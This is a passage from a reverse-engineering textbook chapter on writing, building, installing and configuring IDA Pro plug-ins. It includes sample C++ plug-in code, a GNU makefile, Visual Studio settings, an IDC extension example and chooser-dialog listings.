fore it is important that your plug-in perform its task as expeditiously as possi-

ble and return control to IDA. Otherwise IDA will be completely unresponsive,

and there will be no way to regain control. In other words, once your plug-in

is executing, there is no simple way to break out of it. You must either wait

for your plug-in to complete or kill your IDA process. In the latter case, you

are likely to have an open database on your hands that may or may not be

corrupt and may or may not be repairable by IDA. The SDK offers three

functions that you may use to work around this issue. The show_wait_box

function may be called to display a dialog that displays the message Please

wait . . . along with a Cancel button. You may periodically test whether the

user pressed the Cancel button by calling the wasBreak function. The advan-

tage to this approach is that when wasBreak is called, IDA will take the oppor-

tunity to update its user interface, and it allows your plug-in the opportunity

to decide whether it should stop the processing that it is doing. In any case,

you must call hide_wait_box to remove the Wait dialog from the display.
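The polling pattern described here can be sketched independently of the SDK. In the following model, cancel_query_t plays the role of a "did the user press Cancel?" query; it and the other names are hypothetical, and the comments mark where a real plug-in would show and hide its wait dialog.

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical stand-in for a cancellation query.
typedef bool (*cancel_query_t)(void *ctx);

// Process up to 'total' work items, polling for cancellation once every
// 'poll_interval' items. Returns the number of items actually processed.
std::size_t run_cancellable(std::size_t total, std::size_t poll_interval,
                            cancel_query_t cancelled, void *ctx) {
    assert(poll_interval > 0 && cancelled != NULL);
    std::size_t done = 0;
    // (a real plug-in would display its wait dialog here)
    while (done < total) {
        if (done % poll_interval == 0 && cancelled(ctx)) break;
        done++;   // one unit of work
    }
    // (and remove the dialog here, whether or not the user cancelled)
    return done;
}

// Test double: reports cancellation once it has been polled more than
// 'limit' times.
struct poll_budget_t { int polls; int limit; };

bool budget_exhausted(void *ctx) {
    poll_budget_t *b = static_cast<poll_budget_t *>(ctx);
    return ++b->polls > b->limit;
}
```

Polling every poll_interval items rather than on every item is a design choice: each poll gives the host a chance to refresh its interface, but polling too often can dominate the running time of a tight loop.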

Do not attempt to get creative in your plug-ins by having your PLUGIN.run

function create a new thread to handle the processing within your plug-in.

IDA is not thread safe. There are no locking mechanisms in place to synchro-

nize access to the many global variables used by IDA, nor are there any lock-

ing mechanisms to ensure the atomicity of database transactions. In other

words, if you did create a new thread, and you used SDK functions to modify

the database from within that thread, you could corrupt the database, because

IDA might be in the middle of its own modification to the database that con-

flicts with your attempted changes.

Keeping these limitations in mind, for most plug-ins, the bulk of the work

performed by the plug-in will be implemented within PLUGIN.run. Building on

our previously initialized PLUGIN object, a minimal (and boring) implementa-

tion for PLUGIN.run might look like the following:

void idaapi idabook_plugin_run(int arg) {

msg("idabook plugin activated!\n");

}

Every plug-in has the C++ and IDA APIs at its disposal. Additional capa-

bilities are available by linking your plug-in with appropriate platform-

specific libraries. For example, the complete Windows API is available for

plug-ins developed to run with Windows versions of IDA. To do something

more interesting than printing a message to the output window, you need

to understand how to accomplish your desired task using available functions

from the IDA SDK. Taking the code from Listing 16-6, for example, we might

develop the following function:

void idaapi extended_plugin_run(int arg) {
   func_t *func = get_func(get_screen_ea());   //get function at cursor location
   if (func == NULL) {
      return;                                  //cursor is not inside a function
   }
   msg("Local variable size is %d\n", func->frsize);
   msg("Saved regs size is %d\n", func->frregs);
   struc_t *frame = get_frame(func);           //get pointer to stack frame
   if (frame) {
      size_t ret_addr = func->frsize + func->frregs;   //offset to return address
      for (size_t m = 0; m < frame->memqty; m++) {     //loop through members
         char fname[1024];
         get_member_name(frame->members[m].id, fname, sizeof(fname));
         if (frame->members[m].soff < func->frsize) {
            msg("Local variable ");
         }
         else if (frame->members[m].soff > ret_addr) {
            msg("Parameter ");
         }
         msg("%s is at frame offset %x\n", fname, frame->members[m].soff);
         if (frame->members[m].soff == ret_addr) {
            msg("%s is the saved return address\n", fname);
         }
      }
   }
}

Using this function, we now have the core of a plug-in that dumps stack

frame information for the currently selected function each time the plug-in

is activated.
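The offset comparisons at the heart of the function can be examined in isolation. The following sketch assumes nothing about the SDK: FrameLayout and classify_member are hypothetical names, and the "saved register" label for offsets between the locals and the return address is our own reading, since the function above leaves those members unlabeled.

```cpp
#include <cstddef>
#include <string>

// Hypothetical stand-in for the two frame quantities used in the listing.
struct FrameLayout {
    std::size_t frsize;   // bytes of local variables
    std::size_t frregs;   // bytes of saved registers
};

// Classify a frame member by its starting offset, using the same
// comparisons as the plug-in function above.
std::string classify_member(const FrameLayout &f, std::size_t soff) {
    const std::size_t ret_addr = f.frsize + f.frregs;  // offset of saved return address
    if (soff < f.frsize)  return "local variable";
    if (soff == ret_addr) return "saved return address";
    if (soff > ret_addr)  return "parameter";
    return "saved register";   // assumption: between the locals and the return address
}
```

For a frame with 0x18 bytes of locals and 4 bytes of saved registers, a member at offset 0x10 is a local variable, the member at 0x1c is the saved return address, and anything beyond that is a parameter.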

Building Your Plug-ins

On Windows, plug-ins are valid DLL files (that happen to use a .plw or .p64

extension), while on Linux and Mac, a plug-in is a valid shared object file

(that uses a .plx/.plx64 or .pmc/.pmc64 extension, respectively). Building plug-

ins can be a tricky matter, because you must get all of the build settings cor-

rect or the build process is almost certain to fail. The SDK contains a number

of sample plug-ins, each containing its own makefile. The makefiles were all

created with Borland’s build tools for Windows in mind. This poses some

challenges when you wish to build with a different tool chain or on a differ-

ent platform. The install_xxx.txt files included with the SDK discuss the use

of <SDKDIR>/bin/idamake.pl to build plug-ins using GNU make and gcc. The

purpose of idamake.pl is to generate a GNU make-style makefile from the

Borland-style makefiles and then invoke GNU make to build the plug-in.

Our preference for building plug-ins is to use simplified makefiles with

the GNU tools (via MinGW on Windows). The simplified makefile in List-

ing 17-1 can easily be adapted to your own plug-in projects:

#Set this variable to point to your SDK directory
IDA_SDK=../../

PLATFORM=$(shell uname | cut -f 1 -d _)

ifneq "$(PLATFORM)" "MINGW32"
IDA=$(HOME)/ida
endif

#Set this variable to the desired name of your compiled plugin
PROC=idabook_plugin

ifeq "$(PLATFORM)" "MINGW32"
PLATFORM_CFLAGS=-D__NT__ -D__IDP__ -DWIN32 -Os -fno-rtti
PLATFORM_LDFLAGS=-shared -s
LIBDIR=$(shell find ../../ -type d | grep -E "(lib|lib/)gcc.w32")
ifeq ($(strip $(LIBDIR)),)
LIBDIR=../../lib/x86_win_gcc_32
endif
IDALIB=$(LIBDIR)/ida.a
PLUGIN_EXT=.plw

else ifeq "$(PLATFORM)" "Linux"
PLATFORM_CFLAGS=-D__LINUX__
PLATFORM_LDFLAGS=-shared -s
IDALIB=-lida
IDADIR=-L$(IDA)
PLUGIN_EXT=.plx

else ifeq "$(PLATFORM)" "Darwin"
PLATFORM_CFLAGS=-D__MAC__
PLATFORM_LDFLAGS=-dynamiclib
IDALIB=-lida
IDADIR=-L$(IDA)/idaq.app/Contents/MacOs
PLUGIN_EXT=.pmc
endif

#Platform specific compiler flags
CFLAGS=-Wextra -Os $(PLATFORM_CFLAGS)

#Platform specific ld flags
LDFLAGS=$(PLATFORM_LDFLAGS)

#specify any additional libraries that you may need
EXTRALIBS=

# Destination directory for compiled plugins
OUTDIR=$(IDA_SDK)bin/plugins/

#list out the object files in your project here
OBJS=idabook_plugin.o

BINARY=$(OUTDIR)$(PROC)$(PLUGIN_EXT)

all: $(OUTDIR) $(BINARY)

clean:
	-@rm *.o
	-@rm $(BINARY)

$(OUTDIR):
	-@mkdir -p $(OUTDIR)

CC=g++
INC=-I$(IDA_SDK)include/

%.o: %.cpp
	$(CC) -c $(CFLAGS) $(INC) $< -o $@

LD=g++

$(BINARY): $(OBJS)
	$(LD) $(LDFLAGS) -o $@ $(OBJS) $(IDADIR) $(IDALIB) $(EXTRALIBS)

#change idabook_plugin below to the name of your plugin, make sure to add any
#additional files that your plugin is dependent on
idabook_plugin.o: idabook_plugin.cpp

Listing 17-1: A sample makefile for IDA plug-ins

The preceding makefile uses the uname command to determine the plat-

form on which it is running and configures some build flags accordingly. Addi-

tional source files can be added to the plug-in project by appending the names

of the associated object files to the $OBJS variable and to the end of the make-

file. If your plug-in requires additional libraries, you should specify the library

names in $EXTRALIBS. The $IDA_SDK variable is used to specify the location of

the <SDKDIR>, and $IDA_SDK may be specified as an absolute or a relative

path. In this example, $IDA_SDK is specified as a relative path, indicating that

<SDKDIR> lies two directories above the plug-in’s directory. This is in keeping

with locating plug-in projects within <SDKDIR>/plugins (<SDKDIR>/plugins/

idabook_plugin in this case). If you choose to locate your plug-in’s project

directory in some other location relative to <SDKDIR>, you must ensure that

$IDA_SDK properly refers to <SDKDIR>. Finally, the preceding example is con-

figured to store successfully compiled plug-ins in <SDKDIR>/bin/plugins. It is

important to understand that successfully compiling a plug-in does not nec-

essarily install the plug-in. We cover plug-in installation in the next section.

The use of Microsoft’s Visual C++ Express to build IDA modules is dis-

cussed in install_visual.txt. To create a project from scratch using Visual Stu-

dio 2008, perform the following steps:

1. Select File ▸ New ▸ Project to open the New Project dialog shown in

Figure 17-1.

Figure 17-1: Visual Studio new project-creation dialog

2. Specify the project type as Visual C++/Win32, choose the Win32 Project

template, and provide the name and location for your project. We typi-

cally create new plug-in projects within the <SDKDIR>/plugins directory

in order to keep all of our plug-ins grouped together. When you click

OK, the Win32 Application Wizard appears. Click Next to get to the

Application Settings step and then set the Application type to DLL and

the Additional options to Empty project before clicking Finish, as shown

in Figure 17-2.

Figure 17-2: Visual Studio Win32 Application Wizard

3. Once the basic framework of the project has been created, you must

configure a few additional settings. Project properties in Visual Studio 2008

are accessed via Project ▸ Properties, which brings up the dialog shown

in Figure 17-3. C/C++ configuration options only become available once a

source file has been added to the project, either by adding and editing a

new file or adding an existing file.

Figure 17-3: Visual Studio project properties dialog

The settings that require modification are spread throughout the Con-

figuration Properties section at the left side of the dialog. Figure 17-3 is rep-

resentative of the manner in which properties are set throughout a project.

For each property category selected in the left-hand portion of the dialog, a

list of configurable properties is displayed in the right-hand portion of the

dialog. Note that property categories are organized in a hierarchical fashion.

Properties are edited using file-selection controls, single-line edit controls,

multiline edit controls, or drop-down-list-selection controls. Table 17-1

details the properties that must be edited to create a plug-in project.

Note that Visual Studio allows you to specify separate configuration

options for Debug and Release versions of the project (see top left of Fig-

ure 17-3). If you intend to build separate Debug and Release versions of your

plug-in, make certain that you have modified the properties in both configu-

rations. Alternatively, you may save some time by selecting All Configurations

from the Configurations drop-down list (at the top left of the Properties

dialog), in which case your property changes will be applied to all build

configurations.

Installing Plug-ins

In comparison to the build process, plug-in installation is very simple. Install-

ing a plug-in is accomplished by copying the compiled plug-in module to

<IDADIR>/plugins. Note that Windows systems do not allow an executable

file that is in use to be overwritten. So to install a plug-in on a Windows sys-

tem, you must ensure that any previous version of the plug-in has been

unloaded from IDA. Depending on the plug-in loading options, a plug-in

may be unloaded when a database is closed. However, plug-ins that have

the PLUGIN_FIX flag set may require IDA to be shut down entirely before the

new plug-in can be copied to <IDADIR>/plugins.

On Linux and OS X systems, executable files can be overwritten while

they are in use, so you do not need to ensure that a plug-in is unloaded before

installing a new version of it. However, the new version of the plug-in will not

be loaded into IDA until the next time IDA offers plug-ins a chance to load.

Some IDA plug-ins are distributed in binary form only, while others are

distributed in both source and binary format. Installing such plug-ins usually

involves finding the proper version of the compiled plug-in for your version

of IDA and copying that plug-in to <IDADIR>/plugins. Make sure that you read

the documentation (if any!) that accompanies any plug-in that you wish to

install, because some plug-ins require the installation of additional

components in order to function properly.

Table 17-1: Visual Studio Plug-in Configuration Values (32-bit)

Configuration Property Category   Specific Property                Property Value
-------------------------------   ------------------------------   --------------------------------------
General                           Output Directory                 As desired, often <SDKDIR>\bin\plugins
C/C++ ▸ General                   Additional Include Directories   Add <SDKDIR>\include
C/C++ ▸ Preprocessor              Preprocessor Definitions         Append “;__NT__;__IDP__”
C/C++ ▸ Code Generation           Runtime Library                  Multithreaded (Release)*
                                                                   Multithreaded Debug (Debug)
                                                                   (Not the DLL versions)†
Linker ▸ General                  Output File                      Change extension to .plw
Linker ▸ General                  Additional Library Directories   Add <SDKDIR>\lib\x86_win_vc_32‡
Linker ▸ Input                    Additional Dependencies          Add ida.lib (from \lib\x86_win_vc_32)
Linker ▸ Command Line             Additional options               Add /EXPORT:PLUGIN

* Multithreaded in this case refers to the C++ runtime library itself. IDA just happens to be a single-threaded

application that makes use of this library. A single-threaded version of the C++ runtime library does not

exist.

† Choosing the DLL versions of the C++ library requires that MSVCR80.DLL be present on the system on

which the plug-in will ultimately run. In order to remove this restriction, choose the non-DLL version of the

C++ runtime libraries, which produces a statically linked plug-in that is more portable.

‡ Prior to SDK version 6.1, add library directory <SDKDIR>\lib\vc.w32.

Configuring Plug-ins

IDA provides a limited ability to configure plug-ins via settings in <IDADIR>/

plugins/plugins.cfg. Settings in plugins.cfg can be used to specify the following

information about a plug-in:

• An alternate menu description for the plug-in. This value overrides the

plug-in’s wanted_name data member.

• A nonstandard location or file extension for the plug-in. By default IDA

searches for plug-ins in <IDADIR>/plugins and expects plug-ins to have a

default, platform-specific file extension.

• An alternate or additional hotkey used to activate the plug-in. This value

overrides the plug-in’s wanted_hotkey data member.

• An integer value to be passed to the plug-in’s PLUGIN.run function each

time the plug-in is activated.

• An optional DEBUG flag for use with debugger plug-ins. Debugger plug-ins

are discussed in Chapter 24.

The syntax of a valid plug-in configuration line is described in plugins.cfg.

A few examples of plug-in configuration lines are shown here:

; Semicolons introduce comments. A plugin configuration line consists

; of three required components and two optional components

; plugin_name plugin_file hotkey [integer run arg] [DEBUG]

The_IdaBook_Plugin idabook_plugin Alt-F2 1

IdaBook_Plugin_Alt idabook_plugin Alt-F3 2

The wanted_name and wanted_hotkey data members for a plug-in are chosen

by the plug-in’s author and compiled into the plug-in. It is entirely possible

that two plug-ins developed by different authors may have identical names or

identical hotkey associations. Within plugins.cfg, the plugin_name field specifies

the text (which overrides PLUGIN.wanted_name) to be added to the Edit ▸

Plugins menu. It is possible to assign several names (and therefore several

menu items) to a single plug-in. Underscore characters in the plugin_name

field are replaced with space characters before the name is added to the

Edit ▸ Plugins menu.

The plugin_file field specifies the name of the compiled plug-in module

file to which the current configuration line applies. If a full path is specified,

IDA loads the plug-in from the specified path. If no path is specified, IDA

looks for the plug-in in <IDADIR>/plugins. If no file extension is specified,

then IDA assumes a default plug-in extension for the current platform. If

a file extension is specified, IDA searches for an exact match to the plug-in

filename.
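To make the field layout concrete, the following sketch splits one configuration line into its components. It is an illustration of the format only and makes no claim about how IDA itself parses plugins.cfg: PluginCfgLine and parse_cfg_line are hypothetical names, the default run argument of 0 is an assumption, and accepting hexadecimal integers is a choice made for this sketch.

```cpp
#include <algorithm>
#include <sstream>
#include <string>

// Hypothetical record for one plugins.cfg line; the field names mirror the
// template comment in the configuration example above.
struct PluginCfgLine {
    std::string menu_name;    // plugin_name with underscores shown as spaces
    std::string plugin_file;
    std::string hotkey;
    int run_arg = 0;          // optional integer passed to PLUGIN.run (assumed default)
    bool debug = false;       // optional DEBUG flag
};

// Parse one whitespace-separated configuration line. Returns false for
// comment lines, blank lines, and lines missing a required field.
bool parse_cfg_line(const std::string &line, PluginCfgLine &out) {
    std::string body = line.substr(0, line.find(';'));   // drop any comment
    std::istringstream in(body);
    PluginCfgLine r;
    if (!(in >> r.menu_name >> r.plugin_file >> r.hotkey)) return false;
    std::replace(r.menu_name.begin(), r.menu_name.end(), '_', ' ');
    std::string tok;
    while (in >> tok) {
        if (tok == "DEBUG") r.debug = true;
        else r.run_arg = std::stoi(tok, nullptr, 0);   // throws on a non-numeric token
    }
    out = r;
    return true;
}
```

Feeding it the first example line yields the menu name "The IdaBook Plugin", the file name idabook_plugin, the hotkey Alt-F2, and a run argument of 1.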

The hotkey field specifies the hotkey that should be used to activate the

plug-in. This field overrides the value of PLUGIN.wanted_hotkey and can be

used to resolve conflicting hotkey assignments when two plug-ins have been

built that use the same hotkey for activation. Alternatively, assigning more

than one hotkey to a plug-in offers the ability to activate a plug-in in more than

one way. In such cases, it is useful to specify unique integer arguments for

PLUGIN.run depending on which hotkey was used to activate a plug-in. When

you pass different integer values to PLUGIN.run, IDA makes it possible for a

plug-in to determine exactly how it was activated. This capability is useful

when a plug-in implements more than one behavior and each behavior is

selected based on how the plug-in is activated. In the preceding configura-

tion example, IDA passes the integer value 2 to idabook_plugin’s PLUGIN.run

function whenever the plug-in is activated via the ALT-F3 hotkey sequence.
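A plug-in that wants to take advantage of this might branch on the argument as in the following sketch. The function name select_behavior and the returned strings are hypothetical; the values 1 and 2 are simply the integers from the two configuration lines shown earlier, and in a real plug-in the switch would sit inside PLUGIN.run itself.

```cpp
#include <string>

// Hypothetical behaviors selected by the integer that IDA passes to
// PLUGIN.run. The values 1 and 2 match the two plugins.cfg lines above.
std::string select_behavior(int arg) {
    switch (arg) {
        case 1:  return "activated via Alt-F2";
        case 2:  return "activated via Alt-F3";
        default: return "activated some other way";
    }
}
```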

Extending IDC

So far we have presented plug-ins designed primarily to manipulate or

extract information from a database. In this section, we present an example

of extending the capabilities of the IDC scripting language.1 As mentioned in

Chapter 16, IDC is implemented on top of the IDA API, so it should come as

no surprise that the API can be used to enhance IDC when the need arises.

In Chapters 15 and 16, you learned that IDC global arrays are actually a

somewhat restricted abstraction of netnodes. Recall that in IDC you create

global arrays by supplying a name and receiving an array ID in return. Inter-

nally your name gets prefixed with the string “$ idc_array ”, and the array ID

that you receive is actually a netnode index value. How could we go about

extending IDC in order to enable access to any netnode in an IDA database?

We can already access any netnode whose index we happen to know by using

the index as the array ID in IDC, so what we need is the ability to access any

netnode whose name we happen to know. IDC currently prevents us from

doing this because it prepends “$ idc_array ” to every netnode name we sup-

ply. Enter the SDK and the set_idc_func_ex function.

Defined in expr.hpp, set_idc_func_ex may be used to create a new IDC

function and map its behavior to a C++ implementation. The prototype for

set_idc_func_ex is shown here:

typedef error_t (idaapi *idc_func_t)(idc_value_t *argv, idc_value_t *res);

bool set_idc_func_ex(const char *idc_name, idc_func_t idc_impl,

const char *args, int extfunc_flags);

Note that we have introduced the idc_func_t datatype here in order to

simplify the code somewhat. This datatype is not defined within the SDK.

The arguments to set_idc_func_ex specify the name of the new IDC function

that we are introducing (idc_name), a pointer to the C++ function that

implements our new IDC behavior (idc_impl), a null-terminated array of characters

that specify the argument types and sequence for the new IDC function (args),

and flags (extfunc_flags) indicating whether an open database is required or

whether the function never returns.

1. Note that there is currently no way to programmatically extend the IDAPython API from

within a compiled plug-in.

The following function, used as the initialization function for a plug-in,

completes the process by creating the new IDC function we are designing:

int idaapi init(void) {
   static const char idc_str_args[] = { VT_STR2, 0 };                       // (2)
   set_idc_func_ex("CreateNetnode", idc_create_netnode, idc_str_args, 0);  // (1)
   return PLUGIN_KEEP;
}

This function creates the new IDC function CreateNetnode and maps it to

our implementation function idc_create_netnode (1). The arguments to the

new IDC function are specified as being a single parameter of type string

(VT_STR2) (2).

The function that actually implements the behavior of CreateNetnode is

shown here:

/*
 * native implementation of CreateNetnode. Returns the id of the new netnode
 * this id can be used with all of the existing IDC Array functions.
 */
static error_t idaapi idc_create_netnode(idc_value_t *argv, idc_value_t *res) {
   res->vtype = VT_LONG;                     // (1) result type is a netnode index
   if (argv[0].vtype == VT_STR2) {           // (2) verify we have the proper input type
      netnode n(argv[0].c_str(), 0, true);   // (3) create the netnode
      res->num = (nodeidx_t)n;               // (4) set the result value
   }
   else {
      res->num = -1;                         // (5) if the user supplies a bad argument we fail
   }
   return eOk;
}

The two arguments to this function represent the input argument array

(argv) containing all of the parameters to CreateNetnode (there should be only

one in this case) and an output parameter (res) used to receive the result of

the IDC function we are implementing. The SDK datatype idc_value_t represents

a single IDC value. Fields within this datatype indicate the current type

of data represented by the value and the current contents of the value. The

function begins by specifying that CreateNetnode returns a long (VT_LONG)

value (1). Since IDC variables are untyped, we must indicate internally what

type of value the variable is holding at any given moment. Next, the function

verifies that the caller of CreateNetnode has supplied an argument of type

string (VT_STR2) (2). If a valid argument has been supplied, a netnode is

created with the supplied name (3). The resulting netnode index number is

returned to the caller as the result of the CreateNetnode function (4). In this

example, the result type is an integer value, so the result is stored into the

res->num field. Had the result type been a string, we would have needed to

call res->set_string to set the string value of the result. If the user fails to

supply a string argument, the function fails and returns the invalid netnode

index -1 (5).
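The validate-then-fill-in-the-result shape of this function carries over to any IDC extension. The sketch below mimics that shape with a deliberately simplified stand-in type so that it can be built without the SDK. MockIdcValue, its type tags, and mock_strlen_impl are all hypothetical; the real idc_value_t has more value types and different storage.

```cpp
#include <string>

// Simplified stand-in for the SDK's idc_value_t. The tag names and
// members here are hypothetical.
enum MockType { MOCK_LONG, MOCK_STR };

struct MockIdcValue {
    MockType vtype = MOCK_LONG;
    long num = 0;
    std::string str;
    void set_long(long v) { vtype = MOCK_LONG; num = v; }
    void set_string(const std::string &s) { vtype = MOCK_STR; str = s; }
};

// Same shape as idc_create_netnode: check the type of argv[0], then fill
// in res. Returns 0 on success, mirroring the unconditional eOk above.
int mock_strlen_impl(const MockIdcValue *argv, MockIdcValue *res) {
    if (argv[0].vtype == MOCK_STR) {
        res->set_long(static_cast<long>(argv[0].str.size()));
    }
    else {
        res->set_long(-1);   // bad argument type: report failure through the result
    }
    return 0;
}
```

Because IDC values carry their type with them, the implementation, rather than a compiler, is responsible for rejecting arguments of the wrong type.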

We complete the plug-in with the following functions and PLUGIN structure:

void idaapi term(void) {}    //nothing to do on termination
void idaapi run(int arg) {}  //nothing to do and no way to activate

plugin_t PLUGIN = {
   IDP_INTERFACE_VERSION,
   //this plugin loads at IDA startup, does not get listed on the Edit>Plugins menu
   //and modifies the database
   PLUGIN_FIX | PLUGIN_HIDE | PLUGIN_MOD,   // (1) plugin flags
   init,   // initialize
   term,   // terminate. this pointer may be NULL.
   run,    // invoke plugin
   "",     // long comment about the plugin
   "",     // multiline help about the plugin
   "",     // the preferred short name of the plugin
   ""      // the preferred hotkey to run the plugin
};

The trick to this plug-in is that it loads on IDA startup (PLUGIN_FIX) and

remains hidden from the user because it is not added to the Edit ▸ Plugins

menu (PLUGIN_HIDE) (1). The plug-in is kept in memory for all databases, and

all of the initialization takes place in the plug-in’s init function. As a result,

the plug-in has nothing to do in its run method.

Once this plug-in is installed, an IDC programmer may access any named

netnode in an IDA database using the netnode’s name, as in the following

example:

auto n, val;

n = CreateNetnode("$ imports"); //no $ idc_array prefix will be added

val = GetArrayElement(AR_STR, n, 0); //get element zero

More information for using the SDK to interact with IDC is contained in

the expr.hpp header file.

Plug-in User Interface Options

This book makes no pretense at being a user interface development guide.

However, there are many occasions in which a plug-in will need to interact

with an IDA user to request or display information. In addition to the API’s

askXXX functions mentioned in Chapter 16, a few more complex functions

are available for user interaction via the IDA API. For more adventurous

plug-in authors, it is worth remembering that plug-ins developed for GUI

versions of IDA also have full access to the user interface functions that are

available in various GUI libraries (Qt or Windows Native). Through the use

of these functions it is possible to use virtually any type of graphical interface

element within your plug-ins.

Beyond the SDK’s askXXX interface functions, things get a little more chal-

lenging when using the SDK to build user interface elements. One of the

reasons for this is that the SDK attempts to provide a generic programming

interface to accomplish the fairly complex task of displaying a GUI element

to a user and accepting the user’s input.

Using the SDK’s Chooser Dialogs

The first two functions that we will discuss are called choose and choose2. Each

of these functions, along with various constants used to control its behavior,

is declared in kernwin.hpp. The purpose of each function is to display a list of

data elements to the user and ask the user to select one or more items from

the list. The choose functions are capable of displaying virtually any type of

data by virtue of the fact that they require you to specify formatting functions

that are called to generate each line of text displayed in the chooser window.

The two functions differ in that choose displays a single-column list, while

choose2 is capable of displaying a multicolumn list. In the following examples

we demonstrate the simplest forms of these functions, which rely on many

default parameters. If you want to explore the full range of capabilities of

choose and choose2, please consult kernwin.hpp.

For displaying a single column of information to a user, the simplest

form of the choose function boils down to the following, once default param-

eters are omitted:

ulong choose(void *obj,

int width,

ulong (idaapi *sizer)(void *obj),

char *(idaapi *getline)(void *obj, ulong n, char *buf),

const char *title);

Here, the obj parameter is a pointer to the block of data to be displayed,

and width is the desired column width to be used in the chooser window. The

sizer parameter is a pointer to a function that is capable of parsing the data

pointed to by obj and returning the number of lines required to display that

data. The getline parameter is a pointer to a function that can generate the

character string representation of a single item selected from obj. Note that

the obj pointer can point to any type of data as long as the sizer function can

parse the data to determine the number of lines required to display the data

and as long as the getline function can locate a specific data item using an

integer index and generate a character string representation of that data

item. The title parameter specifies the title string used in the generated

chooser dialog. The choose function returns the index number (1..n) of the

user-selected item or zero if the dialog was canceled by the user. The code in

Listing 17-2, while not terribly exciting, is extracted from a plug-in that dem-

onstrates the use of the choose function.

#include <kernwin.hpp>

//The sample data to be displayed
int data[] = {0xdeafbeef, 0xcafebabe, 0xfeedface, 0};

//this example expects obj to point to a zero
//terminated array of non-zero integers.
ulong idaapi idabook_sizer(void *obj) {
   int *p = (int*)obj;
   int count = 0;
   while (*p++) count++;
   return count;
}

/*
 * obj In this example obj is expected to point to an array of integers
 * n indicates which line (1..n) of the display is being formatted.
 * if n is zero, the header line is being requested.
 * buf is a pointer to the output buffer for the formatted data. IDA will
 * call this with a buffer of size MAXSTR (1024).
 */
char * idaapi idabook_getline(void *obj, ulong n, char *buf) {
   int *p = (int*)obj;
   if (n == 0) {   //This is the header case
      qstrncpy(buf, "Value", strlen("Value") + 1);
   }
   else {          //This is the data case
      qsnprintf(buf, 32, "0x%08.8x", p[n - 1]);
   }
   return buf;
}

void idaapi run(int arg) {
   int choice = choose(data, 16, idabook_sizer, idabook_getline,
                       "Idabook Choose");
   msg("The user's choice was %d\n", choice);
}

Listing 17-2: Example use of the choose function

Activating the plug-in from Listing 17-2 results in the chooser dialog

shown in Figure 17-4.

Figure 17-4: Example of the chooser dialog
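To see how the two callbacks cooperate, it can help to drive them by hand. The following sketch reimplements the sizer and getline callbacks with standard library calls and adds a small driver that requests the header line (n equal to zero) followed by each data line (1..n). The driver render_chooser, the ulong_t typedef, and the demo_ function names are hypothetical, and the request order shown is only one plausible order, since IDA asks for lines as it needs them.

```cpp
#include <cstdio>
#include <string>
#include <vector>

typedef unsigned long ulong_t;   // stand-in for the SDK's ulong

// Callbacks with the same shape as idabook_sizer and idabook_getline,
// written with standard library calls so the sketch builds outside of IDA.
ulong_t demo_sizer(void *obj) {
    const unsigned int *p = static_cast<const unsigned int *>(obj);
    ulong_t count = 0;
    while (*p++) count++;            // data is a zero-terminated array
    return count;
}

char *demo_getline(void *obj, ulong_t n, char *buf) {
    const unsigned int *p = static_cast<const unsigned int *>(obj);
    if (n == 0) std::snprintf(buf, 1024, "Value");            // header line
    else        std::snprintf(buf, 1024, "0x%08x", p[n - 1]); // data line n (1-based)
    return buf;
}

// Hypothetical driver: collects the header followed by every data line.
std::vector<std::string> render_chooser(void *obj,
                                        ulong_t (*sizer)(void *),
                                        char *(*getline)(void *, ulong_t, char *)) {
    std::vector<std::string> lines;
    char buf[1024];
    const ulong_t count = sizer(obj);
    for (ulong_t n = 0; n <= count; n++) {
        lines.push_back(getline(obj, n, buf));
    }
    return lines;
}
```

Note the off-by-one convention: line n of the display corresponds to element n - 1 of the underlying array because index zero is reserved for the header.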

The choose2 function offers a multicolumn variation of the chooser dialog.

Again, we look at the simplest version of the function, accepting all possible

default arguments, which boils down to the following:

ulong choose2(void *obj,

int ncol,

const int *widths,

ulong (idaapi *sizer)(void *obj),

void (idaapi *getline)(void *obj, ulong n, char* const *cells),

const char *title);

We can observe a few differences between choose2 and the choose function

we saw earlier. First, the ncol parameter specifies the number of columns to

be displayed, while the widths parameter is an array of integers that specify the

width of each column. The format of the getline function changes somewhat

in choose2. Since the choose2 dialog can contain several columns, the getline

function must provide data for each column within a single line. The exam-

ple code in Listing 17-3 shows the use of choose2 in a demonstration plug-in.

#include <kernwin.hpp>

//The sample data to be displayed
int data[] = {0xdeafbeef, 0xcafebabe, 0xfeedface, 0};

//The width of each column
int widths[] = {16, 16, 16};

//The headers for each column
const char *headers[] = {"Decimal", "Hexadecimal", "Octal"};

//The format strings for each column
const char *formats[] = {"%d", "0x%x", "0%o"};

//this function expects obj to point to a zero terminated array
//of non-zero integers.
ulong idaapi idabook_sizer(void *obj) {
   int *p = (int*)obj;
   int count = 0;
   while (*p++) count++;
   return count;
}

/*
 * obj In this function obj is expected to point to an array of integers
 * n indicates which line (1..n) of the display is being formatted.
 * if n is zero, the header line is being requested.
 * cells is a pointer to an array of character pointers. This array
 * contains one pointer for each column in the chooser. The output
 * for each column should not exceed MAXSTR (1024) characters.
 */
void idaapi idabook_getline_2(void *obj, ulong n, char* const *cells) {
   int *p = (int*)obj;
   if (n == 0) {
      for (int i = 0; i < 3; i++) {
         qstrncpy(cells[i], headers[i], widths[i]);
      }
   }
   else {
      for (int i = 0; i < 3; i++) {
         qsnprintf(cells[i], widths[i], formats[i], p[n - 1]);
      }
   }
}

void idaapi run(int arg) {
   int choice = choose2(data, 3, widths, idabook_sizer, idabook_getline_2,
                        "Idabook Choose2");
   msg("The choice was %d\n", choice);
}

Listing 17-3: Example use of the choose2 function

The multicolumn chooser dialog generated using the code from List-

ing 17-3 is shown in Figure 17-5.

Figure 17-5: Example of the choose2 dialog
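The per-column formatting performed for each row can also be tried outside of IDA. The sketch below formats a single value into the same three columns (decimal, hexadecimal, octal). The function name format_row is hypothetical, and the sketch uses an unsigned value with %u where Listing 17-3 uses int with %d.

```cpp
#include <cstdio>
#include <string>
#include <vector>

// Format one value into the three columns used by Listing 17-3
// (decimal, hexadecimal, octal). The function name is hypothetical.
std::vector<std::string> format_row(unsigned int value) {
    static const char *const formats[] = {"%u", "0x%x", "0%o"};
    std::vector<std::string> cells;
    for (const char *fmt : formats) {
        char buf[32];                                 // ample for a 32-bit value
        std::snprintf(buf, sizeof(buf), fmt, value);
        cells.push_back(buf);
    }
    return cells;
}
```

Keeping the format strings in an array parallel to the column headers, as the listing does, means that adding a column only requires one new entry in each array.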

Far more complex uses of both the choose and the choose2 functions are

possible. Each function is capable of creating either modal2 or nonmodal

dialogs, and each function can generate dialogs that allow for selection of

multiple items. Also, each function accepts several additional parameters

that allow you to be notified when various events take place within the dialog.

